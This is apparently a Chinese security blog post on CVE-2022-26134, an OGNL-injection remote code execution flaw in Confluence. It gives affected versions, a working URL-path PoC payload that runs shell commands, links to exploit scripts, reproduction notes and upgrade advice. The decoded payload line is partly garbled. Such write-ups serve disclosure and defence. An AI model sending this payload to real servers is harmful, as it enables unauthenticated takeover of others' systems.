Confluence介绍
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。
Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。
受影响版本
Confluence Server and Data Center >= 1.3.0
Confluence Server and Data Center < 7.4.17
Confluence Server and Data Center < 7.13.7
Confluence Server and Data Center < 7.14.3
Confluence Server and Data Center < 7.15.2
Confluence Server and Data Center < 7.16.4
Confluence Server and Data Center < 7.17.4
Confluence Server and Data Center < 7.18.1
安全版本
Confluence Server and Data Center 7.4.17
Confluence Server and Data Center 7.13.7
Confluence Server and Data Center 7.14.3
Confluence Server and Data Center 7.15.2
Confluence Server and Data Center 7.16.4
Confluence Server and Data Center 7.17.4
Confluence Server and Data Center 7.18.1
测试poc
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
/${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("' command '").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
脚本地址
https://github.com/Nwqda/CVE-2022-26134/blob/master/cve-2022-26134.py
https://github.com/crowsec-edtech/CVE-2022-26134/blob/main/exploit.py
本地复现
使用脚本结果:
手动复现结果
wireshark流量展示
本来自己也写了一个脚本,但是发现其实没有人家写的好,这两个脚本对报错异常处理的不是很好,
\CVE-2022-26134-main\exploit.py", line 45, in
print(exploit(target, cmd))
…
KeyError: ‘x-cmd-response’
如果出现类似以上的错误,大家不要慌,说明这个版本是安全的,脚本是没问题的哈
修复建议
升级到Atlassian Confluence Server and Data Center至安全版本。
下载链接:
https://www.atlassian.com/software/confluence/download-archives
若是无法升级,可以参考官方建议,进行相对的修改
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html